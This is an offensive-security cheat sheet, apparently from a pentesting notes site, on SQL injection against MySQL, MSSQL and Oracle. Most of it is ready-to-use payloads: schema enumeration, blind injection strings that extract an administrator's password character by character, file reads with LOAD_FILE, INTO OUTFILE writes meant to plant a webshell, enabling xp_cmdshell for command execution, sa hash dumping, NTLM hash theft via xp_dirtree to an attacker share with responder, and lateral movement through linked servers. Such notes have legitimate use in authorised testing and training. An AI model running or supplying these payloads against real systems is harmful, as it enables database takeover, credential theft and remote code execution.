SQLi
SQL Injection.
Is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database.
Types:
In-band : Printed response (Union-based, Error-based)
Blind : Non-printed response (Boolean-based, Time-based)
Out-of-band : No access (needs to redirect to DNS, for example)
Steps:
Find number of columns (order by or union) and type.
Find TRUE and FALSE conditions. If not possible because they have same output try with error and time delay. Finally try with Out-of-band.
Find Vectors (
union …
) and Boundaries (’
<VECTORS>
-- -
)
CheatSheet PostgreSQL, MySQL, MSSQL, Oracle
Tools
Automatic SQL injection and database takeover tool. See HERE, or the documentation. (Uses a syntax similar to curl)
Identify MySQL
SELECT @@version
In-band, If it is not MySQL it returns an error
SELECT SLEEP(5)
Blind, If it is not MySQL it returns an error
Enumeration DB
@@version
/ version()
MySQL version
database()
Get the current database in use
INFORMATION_SCHEMA
Database that contains all the information.
Main tables:
SCHEMATA (SCHEMA_NAME
db name)
TABLES (TABLE_NAME
,TABLE_SCHEMA
)
COLUMNS (TABLE_NAME
,TABLE_SCHEMA
,COLUMN_NAME
)
GLOBAL_VARIABLES (variable_name
,variable_value
)
Dot Notation (.) to refer to other databases.
User & Privileges
user()
/ current_user()
/ user FROM mysql.user
Get the current user in use
SELECT super_priv FROM mysql.user WHERE user="<NAME>"
View if a user is DBA, Database Administrator with Administrator privileges. To see all fields: mysql.user
SELECT grantee, privilege_type FROM information_schema.user_privileges WHERE grantee="''@'localhost'"
View all privileges of a user. Check if you have FILE
that allows me to read and write files.
To see all fields: INFORMATION_SCHEMA.USER_PRIVILEGES
Action
See Web Root.
show variables like "secure_file_priv";
The secure_file_priv variable determines from where you can read and write (NULL
=no files/directories, EMPTY
=entire file system). Read the value of the variable from INFORMATION_SCHEMA.GLOBAL_VARIABLES
.
MariaDB has secure_file_priv
default to EMPTY
.
MySQL has secure_file_priv
default to /var/lib/mysql-files
or NULL
on some modern configs.
READ
SELECT LOAD_FILE(<PATH>)
If the user has FILE privilege and secure_file_priv empty or with interesting path, it is possible to read files via LOAD_FILE() function. Also used to print source code.
WRITE
SELECT '<STRING>' INTO OUTFILE '<PATH>'
or
SELECT FROM_BASE64(“<BASE64>” ) INTO OUTFILE '<PATH>'
If the user has FILE privilege and secure_file_priv empty or with interesting path, you can write the output of a select to a file with INTO OUTFILE. With long or binary files use base64. Also used to write webshell on the target.
Payload
Table
SELECT table_name FROM information_schema.tables WHERE table_schema = DATABASE() LIMIT 1 OFFSET 0
Column
SELECT column_name FROM information_schema.columns WHERE table_name = '<TABELLA>' LIMIT 1 OFFSET 0
Error
SELECT count(*), concat(( <PAYLOAD_TO_PRINT> ), 0x20 , floor(rand(0)*2)) as x FROM information_schema.tables group by x; -- -
Sometimes in Blind SQLi the condition true and false generate the same output. You can, however, use the Error-Base SQLi to get the true and false condition.
xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
# example
xyz' AND (SELECT CASE WHEN (Username = 'Administrator' AND SUBSTRING(Password, {}, 1) = '{}') THEN 1/0 ELSE 'a' END FROM Users)='a
# oracle
xyz' AND (SELECT CASE WHEN SUBSTR(password,{},1)='{}' THEN TO_CHAR(1/0) ELSE 'a' END FROM users WHERE username='administrator')='a
Credentials sa
Check if it is possible to recover the password hash of the sa account, which has full control over the DBMS.
SELECT name, password FROM master..sysxlogins # MSSQL Server 2000
SELECT name, password_hash FROM master.sys.sql_logins # >= 2005
xp_cmdshell
Procedure that allows you to execute commands, but is disabled by default and requires sa privileges (both to execute commands and to enable/disable xp_cmdshell
).
EXEC master..xp_cmdshell '<command>'
xp_cmdshell <COMANDO>
Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1 ; # or EXECUTE
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Disable xp_cmdshell
EXEC sp_configure 'xp cmdshell' 0;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
With impacket-mssqlclient
enable_xp_cmdshell
xp_cmdshell <COMANDO>
Read file
We can read files, of course if we have the appropriate permissions.
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
NTLM Hash Recovery
We can retrieve and steal the password hash of the MSSQL service account, under which the DB is running, which is different from the one in MSSQL. To do this we use responder.
sudo responder -I <INTERFACE>
EXEC master..xp_dirtree '\\<IP>\share\'
EXEC master..xp_subdirs '\\<IP>\share\'
Impersonation
With the special permission, called IMPERSONATE, it is possible to impersonate other users by assuming their permissions. Administrators can impersonate anyone, while for others, privileges must be explicitly assigned.
Tip: Do in DB master
USE master
Identifying users we can impersonate
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
Impersonation
EXECUTE AS LOGIN = '<WHO>'
Check
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
Communication with other DBs
If we can access a SQL Server with a linked server configured, we may be able to move laterally on that database server. We can try to execute commands if we have the appropriate permissions. Note: It is possible that only some users can execute commands on those DB links, try with everyone, even impersonated ones.
Identify connected servers (try all)
SELECT srvname, isremote FROM sysservers
Executing commands
EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
Note: If we need to use quotes in our query to run on the linked server, we need to use two single quotes to escape the single quote.
Payload
Blind with time delay
'; IF (1=2) WAITFOR DELAY '0:0:10'--
'; IF (1=1) WAITFOR DELAY '0:0:10'--
# example
'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, {}, 1) > '{}') = 1 WAITFOR DELAY '0:0:{delay}'--
Last updated
Was this helpful?